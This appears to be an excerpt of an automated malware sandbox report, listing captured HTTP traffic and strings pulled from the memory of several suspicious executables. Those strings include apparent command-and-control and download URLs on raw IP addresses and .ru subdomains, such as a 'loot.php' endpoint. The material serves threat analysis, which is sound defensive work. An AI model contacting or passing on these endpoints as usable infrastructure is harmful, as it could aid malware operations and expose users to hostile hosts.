                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:56 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=LxyzNDXBY2Kk9o2NsZ3JhND.lw_ckFVrWHhyU4xix3g-1724230796-1.0.1.1-00TUFqbCUQuqKsDCO6Rj1dsXNLy0oagAF0tR.csjiOVDduaOm52Ewl3UJq7J_6g5_5_nQ99QZw9mC_8w_lAoYQ; path=/; expires=Wed, 21-Aug-24 09:29:56 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jKqWpgAQN8iVnLheOYqL8GcBef0W46owytrM81Jnne%2BcwwBPpTkf9vB8GDnxg9w%2BsvBof03rQ82YQIFFfJkPPc70%2FFWAVU0a0GXgm5hYQMOSalZKTXvk6NqjyuDlzLRcOUeAZA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=TWzxHPZwrNypd0f72ewZQEbdNf358qbiQowmXtkIKTc-1724230796254-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696e0c8fc50f60-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:01 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=UPm4koZUTri1ZBlqVF8jXvLi3g.jW9N_cjK8O4BHZrg-1724230801-1.0.1.1-bLwlr_wS1EaRgraLoj2du7UVMmsmyFhQcDBwMlinMg2nG35wzVgDpSkDhXM5AdD1FE.j03I6OcOOYGsKHrkqGQ; path=/; expires=Wed, 21-Aug-24 09:30:01 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2FpogMS1K8ZhkmzVoLG%2B3jYHXMI5ZYSydnHNl%2BejyDsGBIjQFwoB5BvnDDOhe7eCmqSc%2B1aAfQ%2Bl%2FC8wiNvEazgKvyJCQkO%2Bk9%2FVEjL6b%2FtbuPHqP6aabqCsJci1JL7j2Lj3Vg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=Y2mY8.hNfMdokEOoDj0iuWUQlwnHpgixwfmDZcVKAIU-1724230801895-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696e2fc9605e79-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:07 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=Vlp40VoFFmoxXiL8KGE3_ZeH2T4US26PN79VEjWhP_I-1724230807-1.0.1.1-u7phVtUQvOv_bTuAMKCUAObQJMbhT3DtVW6WpzTimYvxhWWThNpHG0R9L1ZU7sK4bBGs5OahIXyoHzLaLFNjVQ; path=/; expires=Wed, 21-Aug-24 09:30:07 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UMUgkTX5ul2TrLML%2B%2F%2B43X32525q9ZQArTtcZLbGRLr08euEy7q7zNdOmmCZk0gDG2o%2Fixqz2N0IeuKG%2FR2jWPWEvUNYahq8qSSW6RMPvab%2FvMnLe06rr9Mnasd1%2B1dpk0ppTw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=3ltFfUXMdUm_VTaq5ylUa3l99E4g3qYSbYl0_zZcY5o-1724230807530-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696e52fe3543fe-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:13 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=1oDfCiJh2IGy5_ByXZSTqDKoCPo2aGVmZl_YaSDhUg8-1724230813-1.0.1.1-5mcLTNdpOUS.h28t.cuX4NrPugUmTgKNRngQ6nDu0MF2ikAa61SFtB7._OuYNWI1557.m5mOXrhIOs2m40abAA; path=/; expires=Wed, 21-Aug-24 09:30:13 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dP3KrWc3rNULTb%2B4TJ3upXZEIAhLgKpT2fX7DBYB6CiGvqkS%2Flsu0JGHjqSOxq8msQ%2BA9nRmrz6AeuApMf7LElhrJGS%2Fw1HnN0LxypeR8kGApApZmRAbtgmzeerkQveSt8P9qw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=Ow_u9KO6VJrFgWdqZtkgRYAmxPrDHk3C5.qxnTAqu80-1724230813156-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696e7618ce1821-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:18 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=vquBfoat0ti8JBRtc2UJDfRrfrFJ_RQq_QmFVBiPXdQ-1724230818-1.0.1.1-ihHMcvoSY3gkQqiaktsrUAwPtSBIqyOved6qF9HWcDEHTOHdIJcvjAMw4s0DOG83iBKeMWyBjKgihrhxGMVvMw; path=/; expires=Wed, 21-Aug-24 09:30:18 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pnpi%2FLX0fbM4s2AyhAT0U2TW9JW4bSLt3UMJDhopWjgS0dj9EHHelwEyzF9yW7EZEXYKlb9zzrvAYxsDmd0KJOnKOVcxqWwJaCQzdgRqfDdjvfECxVfoCvBd8kwwBzcQSSyygw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=JPBHsANHK21PFW6Acd66B23lW83gpH3t5LvwdRLMOAY-1724230818814-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696e998dcd1906-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:24 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=DUlwbPlsV._tPzPtxXTXxjl3uUFCpqQ6ZMase4QvG30-1724230824-1.0.1.1-dwMee_HmryBstTOjBO6d1iHgWGDZbI3_ClcLoKg5p_wyTAgyktA5Qq__EShRqlJxwjgVoTdlcfozpF6LxbKmtw; path=/; expires=Wed, 21-Aug-24 09:30:24 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lQRLgUm1QoK%2F1HvfdaLzTTXgOWaDky9AaK5My2J5K1UgnddD5tVfEyiKsrZ3eX77HQSN%2FOxAA8IgurNG%2FdFybvqvPJyIOmaVDGF1P0yI67uoFA6%2BmIBx6RSg54tN%2FbEcHLZD2A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=P5J4py93aGuJf2iVPIBUq7jLgDyGN._b3ye68lBsHwo-1724230824409-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696ebc7bde5e74-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:30 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=xYgYULbsG3tyKJByRJxxNsnnGNm9EkxlSyc5YLuBQ68-1724230830-1.0.1.1-Sx1NQNE0xZ2szSNFOnRXb1ghDtAD6MYRjCdBPg.qJ0G6Rl3mtYlrhtWbgyI.nxx2Ou6FyhY4szFAqi_PShlmbA; path=/; expires=Wed, 21-Aug-24 09:30:30 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3NSi%2BuZFkocpech5P2sU7dTOg6obM7a3CZ%2Bk2FHEabn9ACGEyEmfA%2BOublDfwwsGyiaFZbwqJUZwJyXj9MOTwg%2FN0x3RlBaUuHdDfgrh%2Bf80CukkoUFmkSeSkPCO2arGr%2FVcA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=DwYx9gQl5y0SE_Pp6M30Mg7isTI85M56GwwPVmX0kjw-1724230830049-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696edfb904426d-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:35 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=gpcZ2YLCYhCVYKwNMOsyC1cDx2Cm7SmZP6sLAkgL4GY-1724230835-1.0.1.1-v8oAKQ.8gnbRzmu70mkw6aXZaJvh1i.kyEy1DmlgLadqmROA2Enok1Df51JCTb1jeNQG5nmTp7gugIC6HqR_.w; path=/; expires=Wed, 21-Aug-24 09:30:35 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L9atcKiCru3a9Vu2yNTHddZA0vYztIvdNjQyVOFdOSmowUYklsDcODMCWdR6PSimiI2hiLSGFYx24cAZIH8tPLUTnDaABavOs2o8DsAmXKqaYb4bWflN7pLIi51h6UFNy4Rkvw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=Si5eXBO9Nadt0DBd2XxLIKh5JF6xeOJJa_I1aWjpypI-1724230835705-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696f031de94304-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:41 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=CG2bMzkwFhzo_6W5zDhheua_EGuaOJe92elWCzkdJ7U-1724230841-1.0.1.1-ZKTjsN3pMRE.Iuyxe9APXiV.pZvzxOe8Fd6y6eIFfcISZd9uKltep5pGtCoHldMc1ZVE_Xa4aztuGNctbG2KkQ; path=/; expires=Wed, 21-Aug-24 09:30:41 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XFgtSjlnOS%2FletsIhKkOOfv942q9%2BSKOv5UBXQUL7dZOBKYWN90PIP9%2FMIUCjz3fLi8AOuGkRKC9lIbkdp3xHKK29YQrXGeOtyyWcaKwTIgW2oEf3lzcwkQxDIr4%2Fw%2FG11kC8w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=4.fEzU4NP3qPT67aKbxzdo9khcXBKp5geySeef9sOzA-1724230841350-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696f265a601971-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:47 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=ryhG8PrW2GoqettBiFQJoUr1.UAq9UIrv2sa1sis4eU-1724230847-1.0.1.1-rQ0jACcnVALW3kY9Dn9PdYHy2pVswGdOJ.1wnJAS41QrTW8CoyiULmLtB90_rNGNoEA97cgTm76x.KUwAi2h9Q; path=/; expires=Wed, 21-Aug-24 09:30:47 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cfk1s4rnAVdavSZEQgSvlRiFi9I9tTaahZVrbIQAgOl%2Fe3CJBMLPYg4nWCnvwfT2n8FyNJwAjiWvcIaruaWoWP06yUsiBk29A%2FhSDs0wbto0GJ3yLqWg3%2FNV3rdZ%2Fs21l8cAZw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=uxUy69UtfTGgc_w3guur9ZGxSDrlJY0eiLq0bX9hFiM-1724230847131-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696f4a7ed37292-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:52 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=nkUBmIBtxze4Ei2AYFyKtFZYwfCS9uHdCpJT1I11QWg-1724230852-1.0.1.1-DuQqOCTrKAGVK5GA3QCvkdor8QGv03DvT1pL.k5vTnnT14a8KQrXAur6CwkSjInS0e9p5skkNd3FWLB818eXNQ; path=/; expires=Wed, 21-Aug-24 09:30:52 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K9K3VOPZsMXZ9y4Za9KPzV7go3MxZ24piwL9DXEilTNB6JBS8%2F6CGW8U3NlQmwE4QA1VQQi1RI209N6NbqNFNrLgdyIF14vPkZcGlJ1fiaI40na4gaYgdzn5v5WnJvRgtSfbAw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=NoM7KgtlJXSIOluf.rpbowjI0XHoHepIeAUSdyGsi88-1724230852783-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696f6dda02c35f-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:58 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=ZYThuz8gU4Zjf8bttJRbbZ66RSbATbPjyH27xidCT6s-1724230858-1.0.1.1-vbfA_wmpp9QGlNswZmGk3p3f27MLEjPzJ9.LzgZhJa0nWIDFeuv6uul7SZQe04pVdtG2BgLBV83XQ8axMPgkXA; path=/; expires=Wed, 21-Aug-24 09:30:58 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fPAZjCZKp1HxtZ9xciX%2B8fE%2F7xz5v%2B5nLZyQ7UKXVl7LsgO4dHPkTYbIXE2sFRu99hu4bepM3viw%2BJW8%2FfqntC6JWw1ztFlh0PHARghQLEBE0gkETH5d%2FxyCNGGPcLTUSU41og%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=TAdansgSXPEGma0KpPyPjPeyk_2zoSlOqI0w2mmFEXg-1724230858423-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696f911e4e43a6-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:01:04 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=QE8sXrft4O235HQa2l0sHP7XbF3mMirvFzhwqy9UYBI-1724230864-1.0.1.1-fqGuNa7aYkVO0oLFCATi7wnSkwKvyKFHvO6GYaAAjeBBnpCqk40xvQnaLeOu_eHSBHZkgaGb9_TDCCg3LqpWNw; path=/; expires=Wed, 21-Aug-24 09:31:04 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WptpOnAp5y63yFrvDHjn6DW7Qu7%2BsmIs%2BatK502qbb33%2FAoNB1ZCO3EcB8TQ6L8K%2FduH9XbYhCO1YSyJynZF3gZIbOj9y%2FypDhypKWPd%2FSwK%2BeoJ6r5Hr3z0SM12MADis44rOw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=3.FDysOfRq8HCNmLtnF4lfo84o7BtaNJya51IP6dQgQ-1724230864112-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696fb4aece19d7-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:30 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XMPZcVCLz7oUqPNw7shSOIByM9YE04cLZllZ7sOIyjnJq1H77lEDrCi9cQyWRmoqLpZoMuybl87M7Dn2MGKrqEdVk99EemzmpSS6LpICv0PAFi50r7UA4Pwk6TGeeoo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b696a7c7f237cab-EWRalt-svc: h3=":443"; ma=86400Data Raw: 34 36 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 62 36 39 36 61 37 63 37 66 32 33 37 63 61 62 27 2c 74 3a 27 4d 54 63 79 4e 44 49 7a 4d 44 59 31 4d 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 61 2e 6e 6f 6e 63 65 3d 27 27 3b 61 2e 73 72 63 3d 27 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 73 63 72 69 70 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 22 3b 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 29 7d 7d 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 Data Ascii: 46e<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8b696a7c7f237cab',t:'MTcyNDIzMDY1MC4wMDAwMDA='};var a=document.createElement('script')
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 7Content-Type: application/octet-streamDate: Wed, 21 Aug 2024 08:57:50 GMTData Raw: 03 00 00 00 70 e8 c6 Data Ascii: p
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Wed, 21 Aug 2024 08:57:50 GMT
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Wed, 21 Aug 2024 08:57:50 GMT
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.133.1.107/Z
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.000000000320B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.133.1.107/server.txt
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.000000000320B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.133.1.107/server.txti
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmp, Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixone
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixone$5
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixone-:
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixone3:
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixone75
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixone8
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001A6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixone?
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixoneG:
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixoneMtM2-KF1hw
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixoneQ5
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixonea:
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixonen:
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixonet:
                  Source: Mon17948100733a95c58.exe, 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, Mon17948100733a95c58.exe, 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://4tfdv6.rafilda.ru/1kerKKKKOOOOnel3KKKKOOOO2-useIntPtrr32.dlIntPtrl
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.178.186.149/
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003237000.00000004.00000020.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.00000000032C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.178.186.149/base/api/statistics.php
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.178.186.149/base/api/statistics.php0(
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.178.186.149/j(
                  Source: Mon17eac6d534bfd22c7.exe, 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://7hni.kamisime.ru/1kerKKKKOOOOnel3KKKKOOOO2-useIntPtrr32.dlIntPtrl
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8yfg.federguda.ru/1kerKKKKOOOOnel3KKKKOOOO2-useIntPtrr32.dlIntPtrl
